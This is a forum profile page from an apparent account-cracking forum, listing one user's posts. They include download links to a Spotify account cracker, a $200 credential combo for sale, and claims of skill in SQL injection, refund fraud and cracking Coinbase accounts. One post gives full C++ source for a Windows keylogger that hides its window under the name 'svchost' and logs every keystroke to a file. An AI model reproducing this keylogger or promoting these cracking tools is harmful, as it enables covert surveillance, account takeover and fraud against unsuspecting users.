
INTIBABYPUSHA
Members-
Content Count
149 -
Last visited
-
Days Won
1
Content Type
Profiles
Forums
Calendar
Gallery
Blogs
Store
Articles
Downloads
Classifieds
Everything posted by INTIBABYPUSHA
-
Virustotal : https://www.virustotal.com/#/file/b5a77522fe3d997e190b02e676a9e503482da8946f9c791e7d9f8e01608360ca/detection [hide]https://www.sendspace.com/file/afrujt[/hide] DON'T BE A LEECHER :pepegun:
-
Spotify proxyless cracker for cracked.to
INTIBABYPUSHA replied to INTIBABYPUSHA's topic in Exclusive Releases
Do you like it ? ^^ -
Spotify proxyless cracker only captures premium hits. original by Raghav Jhavar Virustotal : https://www.virustotal.com/#/file/60b503139c190c7ac568f5b18dcce60a265d995ccb37d41eee1fda4cf71c175a/detection Jotti's Malwarescan : https://virusscan.jotti.org/de-DE/filescanjob/w1d3xggkgw [hide]https://www.sendspace.com/file/fin5ue[/hide] Don't be a leecher :pepegun:
-
#include #include #include #include #define DEBUG 1 #define OUTFILE_NAME "Logs\\WinKey.log" /* Output file */ #define CLASSNAME "winkey" #define WINDOWTITLE "svchost" char windir[MAX_PATH + 1]; HHOOK kbdhook; /* Keyboard hook handle */ bool running; /* Used in main loop */ /** * \brief Called by Windows automagically every time a key is pressed (regardless * of who has focus) */ __declspec(dllexport) LRESULT CALLBACK handlekeys(int code, WPARAM wp, LPARAM lp) { if (code == HC_ACTION && (wp == WM_SYSKEYDOWN || wp == WM_KEYDOWN)) { static bool capslock = false; static bool shift = false; char tmp[0xFF] = {0}; std::string str; DWORD msg = 1; KBDLLHOOKSTRUCT st_hook = *((KBDLLHOOKSTRUCT*)lp); bool printable; /* * Get key name as string */ msg += (st_hook.scanCode << 16); msg += (st_hook.flags << 24); GetKeyNameText(msg, tmp, 0xFF); str = std::string(tmp); printable = (str.length() <= 1) ? true : false; /* * Non-printable characters only: * Some of these (namely; newline, space and tab) will be * made into printable characters. * Others are encapsulated in brackets ('[' and ']'). */ if (!printable) { /* * Keynames that change state are handled here. */ if (str == "CAPSLOCK") capslock = !capslock; else if (str == "SHIFT") shift = true; /* * Keynames that may become printable characters are * handled here. */ if (str == "ENTER") { str = "\n"; printable = true; } else if (str == "SPACE") { str = " "; printable = true; } else if (str == "TAB") { str = "\t"; printable = true; } else { str = ("[" + str + "]"); } } /* * Printable characters only: * If shift is on and capslock is off or shift is off and * capslock is on, make the character uppercase. * If both are off or both are on, the character is lowercase */ if (printable) { if (shift == capslock) { /* Lowercase */ for (size_t i = 0; i < str.length(); ++i) str[i] = tolower(str[i]); } else { /* Uppercase */ for (size_t i = 0; i < str.length(); ++i) { if (str[i] >= 'A' && str[i] <= 'Z') { str[i] = toupper(str[i]); } } } shift = false; } #ifdef DEBUG std::cout << str; #endif std::string path = std::string(windir) + "\\" + OUTFILE_NAME; std::ofstream outfile(path.c_str(), std::ios_base::app); outfile << str; outfile.close(); } return CallNextHookEx(kbdhook, code, wp, lp); } /** * \brief Called by DispatchMessage() to handle messages * \param hwnd Window handle * \param msg Message to handle * \param wp * \param lp * \return 0 on success */ LRESULT CALLBACK windowprocedure(HWND hwnd, UINT msg, WPARAM wp, LPARAM lp) { switch (msg) { case WM_CLOSE: case WM_DESTROY: running = false; break; default: /* Call default message handler */ return DefWindowProc(hwnd, msg, wp, lp); } return 0; } int WINAPI WinMain(HINSTANCE thisinstance, HINSTANCE previnstance, LPSTR cmdline, int ncmdshow) { /* * Set up window */ HWND hwnd; HWND fgwindow = GetForegroundWindow(); /* Current foreground window */ MSG msg; WNDCLASSEX windowclass; HINSTANCE modulehandle; windowclass.hInstance = thisinstance; windowclass.lpszClassName = CLASSNAME; windowclass.lpfnWndProc = windowprocedure; windowclass.style = CS_DBLCLKS; windowclass.cbSize = sizeof(WNDCLASSEX); windowclass.hIcon = LoadIcon(NULL, IDI_APPLICATION); windowclass.hIconSm = LoadIcon(NULL, IDI_APPLICATION); windowclass.hCursor = LoadCursor(NULL, IDC_ARROW); windowclass.lpszMenuName = NULL; windowclass.cbClsExtra = 0; windowclass.cbWndExtra = 0; windowclass.hbrBackground = (HBRUSH)COLOR_BACKGROUND; if (!(RegisterClassEx(&windowclass))) return 1; hwnd = CreateWindowEx(NULL, CLASSNAME, WINDOWTITLE, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 640, 480, HWND_DESKTOP, NULL, thisinstance, NULL); if (!(hwnd)) return 1; /* * Make the window invisible */ #ifdef DEBUG /* * Debug mode: Make the window visible */ ShowWindow(hwnd, SW_SHOW); #else ShowWindow(hwnd, SW_HIDE); #endif UpdateWindow(hwnd); SetForegroundWindow(fgwindow); /* Give focus to the previous fg window */ /* * Hook keyboard input so we get it too */ modulehandle = GetModuleHandle(NULL); kbdhook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)handlekeys, modulehandle, NULL); running = true; GetWindowsDirectory((LPSTR)windir, MAX_PATH); /* * Main loop */ while (running) { /* * Get messages, dispatch to window procedure */ if (!GetMessage(&msg, NULL, 0, 0)) running = false; /* * This is not a "return" or * "break" so the rest of the loop is * done. This way, we never miss keys * when destroyed but we still exit. */ TranslateMessage(&msg); DispatchMessage(&msg); } return 0; } g++ s.key.log.cpp -o keylogger ./a.out
-
[hide]https://www.sendspace.com/file/dwzivn[/hide] Don't be a leecher hit the green :pepegun:
-
Thanks :comfy:
-
Thanks :comfy:
-
Thanks :ezy:
-
200 $ for a combo :fappa:
-
Welcome and have fun :D
-
Welcome, and have fun here
-
@Teken no shoot me in the face bitch
-
Help plz haha i want it
-
Ace, are you on MPGH with that name aswell ? MPGH i have 10k Thanks there lol Whats ur MPGH name On a side note. Welcome pepo Vosswater https://gyazo.com/150f581da90d14ff83f4a8ab4ff6a2ef https://gyazo.com/fe327a2551b6d5b3d7d85074d8e0eafb but here lol
-
Ace, are you on MPGH with that name aswell ? MPGH i have 10k Thanks there lol
-
What is that a account ?
-
[align=center]Experience and skills I can dump csgo cheats etc with OllyDbg. I know the basics of a Sqli injection and can make my own combos and share it here. I've learned the basics of SE and can do a normal amzon refund etc. I can do my own configs for Sentry,Snipr,Storm... And i can crack some normal things like Uplay,Coinbase etc, Link your most HQ threads https://cracked.to/Thread-Config-STORM-NORDVPN-proxyless-by-me https://cracked.to/Thread-12x-Unchecked-Mega-acc-s-min-files-2 https://cracked.to/Thread-User-pass-MAIL-PASS-18k-PAID-PRIVATE-COMBO Not that much but i will share more in the future. The only time succes comes before work is in the dictionary. [/align]
-
Zac's PREMIUM Refunds | Asos | Amazon | Custom Stores - WORLDWIDE - LOW FEE
INTIBABYPUSHA replied to Zac's topic in Services
+1 fuck nulled :kek: -
THREAD DESIGN | HIGH QUALITY | PROFFESIONAL | CHEAP
INTIBABYPUSHA replied to Crown's topic in Graphics Market
Free bump !!!!! -
+1 keep it up bruder